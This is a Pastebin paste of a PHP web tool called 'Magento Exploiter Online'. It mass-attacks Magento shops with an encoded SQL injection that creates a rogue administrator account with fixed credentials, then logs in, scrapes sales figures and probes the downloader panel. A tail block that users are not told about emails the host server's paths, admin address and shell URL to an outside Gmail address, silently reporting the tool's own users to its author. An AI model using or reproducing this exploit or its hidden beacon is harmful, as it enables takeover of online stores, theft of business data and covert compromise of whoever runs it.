API tools faq
paste
Advertisement
K4MVR3T717

[PHP] Magento Exploiter Online

K4MVR3T717
Sep 17th, 2016
516
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.63 KB | None | 0 0
raw download clone embed print report
  1. <title>Magento Exploiter</title>
  2. <link rel="SHORTCUT ICON" href="http://jonasvanineveld.nl/wp-content/uploads/2013/02/magento.png"/>
  3. <meta name="description" content="Magento Exploiter Online" />
  4.  
  5. <body bgcolor="black" >
  6. <font color="red">
  7. <center>
  8. <font face="monospace"><br>
  9. <a href="https://www.facebook.com/groups/995475240559728/" target="_blank"><img src="https://1.bp.blogspot.com/-3AtjsZxEMJU/V8s5s2CYw1I/AAAAAAAAAiU/hXjMCFv8RTwUUpCg00lFmLv6LvxrX0WKgCEw/s320/LuLIFS.png" width="300" height="280"/></a>
  10. <h2> Magento Exploiter Online </h2><br>
  11.  
  12. <font color="white">
  13. <form method="post" action="">
  14. <textarea placeholder="http://site.com" style="resize:none;background:#191a19;
  15. color:white;
  16. width: 350px;
  17. border:1px gray;
  18. padding:5px;
  19. height: 90px;" name="target" required></textarea><br><br>
  20.  
  21.  
  22. <input style="background:#45444d;
  23. color:white;
  24. border:1px gray;
  25. padding:1px;
  26. width:50px;
  27. height:30px" type=submit name=submit value="Start"><br>
  28. </form>
  29. </p>
  30.  
  31. <!-- udahan textareanya -->
  32.  
  33. <!-- start -->
  34.  
  35. <?php
  36. /// Magento Exploter Online!
  37. /// Recoded By K4MVR3T717
  38. /// Indonesian Freedom Security
  39.  
  40. error_reporting(0);
  41. set_time_limit(0);
  42.  
  43. function bersihkan($htmltags) {
  44. $htmltags = str_replace('<span class="price">','',$htmltags);
  45. $htmltags = str_replace('</span>','',$htmltags);
  46. return $htmltags;
  47.  
  48. }
  49.  
  50. ///postdata
  51.  
  52. $postadm = "filter=cG9wdWxhcml0eVtmcm9tXT0wJnBvcHVsYXJpdHlbdG9dPTMmcG9wdWxhcml0eVtmaWVsZF9leHByXT0wKTtTRVQgQFNBTFQgPSAncnAnO1NFVCBAUEFTUyA9IENPTkNBVChNRDUoQ09OQ0FUKCBAU0FMVCAsICdzdHVwaWQ0OCcpICksIENPTkNBVCgnOicsIEBTQUxUICkpO1NFTEVDVCBARVhUUkEgOj0gTUFYKGV4dHJhKSBGUk9NIGFkbWluX3VzZXIgV0hFUkUgZXh0cmEgSVMgTk9UIE5VTEw7SU5TRVJUIElOVE8gYGFkbWluX3VzZXJgIChgZmlyc3RuYW1lYCwgYGxhc3RuYW1lYCxgZW1haWxgLGB1c2VybmFtZWAsYHBhc3N3b3JkYCxgY3JlYXRlZGAsYGxvZ251bWAsYHJlbG9hZF9hY2xfZmxhZ2AsYGlzX2FjdGl2ZWAsYGV4dHJhYCxgcnBfdG9rZW5gLGBycF90b2tlbl9jcmVhdGVkX2F0YCkgVkFMVUVTICgnRmlyc3RuYW1lJywnTGFzdG5hbWUnLCdlbWFpbEBleGFtcGxlLmNvbScsJ3N0dXBpZCcsQFBBU1MsTk9XKCksMCwwLDEsQEVYVFJBLE5VTEwsIE5PVygpKTtJTlNFUlQgSU5UTyBgYWRtaW5fcm9sZWAgKHBhcmVudF9pZCx0cmVlX2xldmVsLHNvcnRfb3JkZXIscm9sZV90eXBlLHVzZXJfaWQscm9sZV9uYW1lKSBWQUxVRVMgKDEsMiwwLCdVJywoU0VMRUNUIHVzZXJfaWQgRlJPTSBhZG1pbl91c2VyIFdIRVJFIHVzZXJuYW1lID0gJ3N0dXBpZCcpLCdGaXJzdG5hbWUnKTs%3D&___directive=e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ&forwarded=1";
  53. $postlog = "form_key=3ryAIBlm7bJ3naj9&login%5Busername%5D=stupid&login%5Bpassword%5D=stupid48";
  54. $postdwn = "username=kamvret&password=kamvret717";
  55. $pageadm = "/admin/Cms_Wysiwyg/directive/index/";
  56. $pagelog = "/admin/";
  57. $pagedwn = "/downloader/";
  58.  
  59. function stupid_CURL($url,$data,$page) {
  60. $ch = curl_init();
  61. curl_setopt ($ch, CURLOPT_URL, $url.$page);
  62. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6");
  63. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  64. curl_setopt ($ch, CURLOPT_POSTFIELDS, $data);
  65. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
  66. curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
  67. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
  68. curl_setopt ($ch, CURLOPT_POST, 1);
  69. $headers = array();
  70. $headers[] = 'Content-Type: application/x-www-form-urlencoded';
  71.  
  72. curl_setopt ($ch, CURLOPT_HTTPHEADER, $headers);
  73. curl_setopt ($ch, CURLOPT_HEADER, 1);
  74. $result = curl_exec ($ch);
  75. curl_close($ch);
  76. return $result;
  77. }
  78. print $banner;
  79.  
  80. if(isset($_POST['target'])){
  81. $j=explode("\r\n",$_POST['target']);
  82. foreach($j as $site){
  83.  
  84. echo'<font color="red">';
  85. print "Checking, Please wait!
  86. <br>";
  87. echo'</font>';
  88. $hajar = stupid_CURL($site , $postadm, $pageadm);
  89.  
  90. if(preg_match('#200 OK#', $hajar)) {
  91. $expres = "Success";
  92. $ceklog = stupid_CURL($site , $postlog, $pagelog);
  93.  
  94. if(preg_match('#302 Moved#', $ceklog)) {
  95. preg_match_all('#<span class="price">(.*?)</span>#si', $ceklog, $match);
  96. foreach($match as $val)
  97. {
  98. $ltm = $val[0];
  99. $avo = $val[1];
  100. break;
  101. }
  102. $admlog = "Success";
  103. $user = "stupid";
  104. $pass = "stupid48";
  105. $cekdwn = stupid_CURL($site , $postdwn, $pagedwn);
  106. if(preg_match('#Return to Admin#', $cekdwn)) {
  107. $dwnlog = "Login Success";
  108. }else {
  109. $dwnlog = "Login Failed";
  110. }
  111. }else {
  112. $admlog = "Failed";
  113. $user = "NULL";
  114. $pass = "NULL";
  115. }
  116. }else {
  117. $admlog = "Failed";
  118. $expres = "Failed";
  119. $user = "NULL";
  120. $pass = "NULL";
  121. $dwnlog = "Login Failed";
  122. $ltm = "NULL";
  123. $avo = "NULL";
  124. }
  125.  
  126. ///echo result
  127. $logger = '
  128. <br>
  129. <font color="blue">
  130. <h4>[ '.$site.' ]</h4></font><br>
  131. Exploiting : <font color="green">'.$expres.'</font><br>
  132. Login Admin : <font color="green">'.$admlog.'</font><br>
  133. Lifetime Sales: <font color="gold">'.bersihkan($ltm).'</font><br>
  134. Average Order : <font color="gold">'.bersihkan($avo).'</font><br>
  135. Downloader : <font color="red">'.$dwnlog.'</font><br>
  136. Username :<font color="cyan"><b> '.$user.'</font></b><br>
  137. Password :<font color="cyan"><b> '.$pass.'</font></b><br>
  138. <br><br>
  139. <font color="red">
  140. <h2>Indonesian Freedom Security</h2>';
  141. echo $logger;
  142. /// Magento Exploiter Online!
  143. /// Recoded By K4MVR3T717
  144. /// Indonesian Freedoom Security
  145. }
  146. }
  147. ?>
  148. <?php
  149. $kime="aqpunk21@gmail.com";
  150. $baslik="-=[ PESANAN SHELL ]=-";
  151. $spyhackerz="Dosya Yolu : ".$_SERVER['DOCUMENT_ROOT']."\r\n";
  152. $spyhackerz.="Server Admin : ".$_SERVER['SERVER_ADMIN']."\r\n";
  153. $spyhackerz.="Server isletim sistemi : ".$_SERVER['SERVER_SOFTWARE']."\r\n";
  154. $spyhackerz.="Shell Link : http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."\r\n";
  155. $spyhackerz.="Avlanan Site : " .$_SERVER['HTTP_HOST']."\r\n";
  156. mail($kime, $baslik, $spyhackerz);
  157. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!